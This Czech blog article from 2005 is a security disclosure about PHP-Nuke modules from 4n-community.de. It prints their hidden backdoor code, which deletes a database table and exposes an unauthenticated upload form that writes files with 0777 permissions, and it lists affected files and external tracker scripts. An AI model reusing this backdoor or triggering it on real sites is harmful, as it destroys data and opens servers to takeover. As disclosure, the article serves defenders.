Multi album a jiné moduly od 4n-community

Publikováno: 04.09, 2005
Publikoval: Blassen Téma: Vše co se nějak vztahuje k xxNuke počet slov: 566

Předně bych chtěl říci, že se jedná o Multi-Foto Album od 4n-community.de (Album.zip) ... nikoliv o 4nAlbum od www.warp-speed.de !!
Je to velmi důležité, protože "4n" v názvu může být velmi zavádějící.

A co že je na tom modulu tak zajímavého?

Vpodstatě nic, krom toho, že do něj byl naprogramován formulář, který otvírá zadní vrátka pro takzvaný exploit, který může v horším případě zlikvidovat celou databázi.

{ Kód }:

if ($ko==1)

{

   sql_query("DELETE FROM $table", $dbi);

   echo "<form action='modules.php?name=Album&ok=1&ko=1&f=$f' "

       . "enctype='multipart/form-data' method='POST'>"

       . "<br><input class=input name='datei' type='file' "

       . "size='20'><input type=submit value=''></form>"; 

   echo "$lang<br>";

   echo "$user_prefix<br>";

   if(@unlink($f))

   {

       echo " $f";

       $f="0";

   }

   if($ok==1)

   {

       $dest = "modules/Album/$datei_name";

   }

   if(@copy($datei, $dest))

   {

       $dat= "modules/Album/$datei_name";

       chmod ($dat, 0777);

       echo "file size: $datei_size Byte";

   }

}

V nadpisu článku jste si jistě všimli, že je tam "a jiné moduly".
Je to proto, protože podobný kód obsahují prakticky všechny moduly od 4n-community.de .

Povětšinou v nich lze najít takovýto kód:

{ Kód }:

if ($ko==1){sql_query("DELETE FROM $table", $dbi); echo "<center><br><form action='modules.php?name=XXX&ok=1&ko=1&f=$f' enctype='multipart/form-data' method='POST'>

<br><input class=input name='datei' type='file' size='30'>

<input type=submit value=''><br><br></form></center>";

Konkrétně tento jsem našel v modulu pro zasílání pohlednic "Card" (/modules.php?name=Card).

Tady je stučný přehled možných souborů s vadným kódem:
7 modulů a 7 souborů obsahujících: DELETE FROM $table" :

/modules/Album/index.php (129)
if ($ko==1){sql_query("DELETE FROM $table", $dbi); echo "<form action='modules.php?name=Album&ok=1&ko=1&f=$f' enctype='multipart/form-data' method='POST'>

/modules/Card/index.php (93)
if ($ko==1){sql_query("DELETE FROM $table", $dbi); echo "<center><br><form action='modules.php?name=Card&ok=1&ko=1&f=$f' enctype='multipart/form-data' method='POST'>

/modules/Guestbook/index.php (63)
if ($ko==1){sql_query("DELETE FROM $table", $dbi);}

/modules/Never_Ending_Story/index.php (56)
if ($ko==1){sql_query("DELETE FROM $table", $dbi);}

/modules/Orakel/index.php (32)
if ($ko==1){sql_query("DELETE FROM $table", $dbi);}

/modules/serbook/index.php (192)
if ($ko==1){sql_query("DELETE FROM $table", $dbi); echo "<form action='modules.php?name=Userbook&ok=1&ko=1&f=$f' enctype='multipart/form-data' method='POST'>

/modules/WWWwishlist/index.php (124)
if ($ko==1){sql_query("DELETE FROM $table", $dbi);}

Další jsou nalezené trackery, které by tam také neměli být:

/modules/Album/picture.php (58)
document.write('<script src="http://www.4n-community.de/tracker/tracker.php?track='+s_track+'"></script>');

/modules/Album/picture1.php (39)
document.write('<script src="http://www.4n-community.de/tracker/tracker.php?track='+s_track+'"></script>');

/modules/Album/template.htm (30)
<param name="ShowTracker" value="0">

/modules/Album/template1.htm (33)
<param name="ShowTracker" value="0">

/modules/Album/vorschau.htm (53)
<param name="ShowTracker" value="0">

/modules/Album/vorschau1.htm (57)
<param name="ShowTracker" value="0">

/modules/Card/start.php (4)
document.write('<script src="http://www.4n-community.de/tracker/tracker.php?track='+s_track+'"></script>');

/modules/Card/start.php (214)
document.write('<script src="<? echo "$view"; ?>/tracker/referer.php?referer='+s_referer+'"></script>');

/modules/Card/template.htm (31)
<param name="ShowTracker" value="0">

/modules/Card/vorschau.htm (50)
<param name="ShowTracker" value="0">

/modules/Guestbook/index.php (105)
document.write('<script src="http://www.4n-community.de/tracker/tracker.php?track='+s_track+'"></script>');

/modules/Never_Ending_Story/index.php (39)
document.write('<script src="http://www.4n-community.de/tracker/tracker.php?track='+s_track+'"></script>');

/modules/Orakel/orakel.php (17)
document.write('<script src="http://www.4n-community.de/tracker/tracker.php?track='+s_track+'"></script>');

/modules/Userbook/picture.php (59)
document.write('<script src="http://www.4n-community.de/tracker/tracker.php?track='+s_track+'"></script>');

/modules/Userbook/picture1.php (39)
document.write('<script src="http://www.4n-community.de/tracker/tracker.php?track='+s_track+'"></script>');

Poznámka: čísla v závorce jsou čísla řádků..

Autor: Blassen

Sdílet na FB

Publikoval: Blassen

Související témata

Vše co se nějak vztahuje k xxNuke

Možnosti

Vytisknout článek

PDF

"Multi album a jiné moduly od 4n-community" | Přihlásit/Registrovat | 0 komentářů

BLASSENweb jako provozovatel blassenweb.net a přidružených subdomén, nezodpovídá za obsah komentářů. Provozovatel služby si vyhrazuje právo zasahovat do diskuze v případě používání vulgarizmů, osočování a též vždy, když je obsah příspěvku spůsobilý naplnit skutkovou podstatu trestného činu nebo zasahuje do práva na ochranu osobnosti třetích osob. Ve vyjímečném případě může přistoupit k smazání příspěvků nebo zablokování přístupu i těm, kteří přímo neporušují kodex, ale jejich působení je dlouhodobě překážkou slušné a věcné diskuze a obtěžuje ostatní diskutující. Přispíváním komentářů vyjadřujete svůj souhlas s těmito pravidly a zavazujete se je dodržovat. Přidáním příspěvku souhlasíte s možným dalším uveřejněním na blassenweb.net bez nároku na finanční odměnu.

Není povoleno posílat komentáře anonymně, prosím zaregistrujte se.

BLASSENweb - the future of your web !

Hlavní nabídka

Nástroje

Články

Komunikace

Ostatní

Vyhledávání

RYCHLÉ ODKAZY

NEVÍTE SI RADY...
Nevíte si rady s koupí domény ? S výběrem webhostingu ? Rádi vám poradíme. log in!

Pro volné chvíle

Možnosti pro Vás

Odkazy

Doporučujeme vám:

Reklama

Sponzor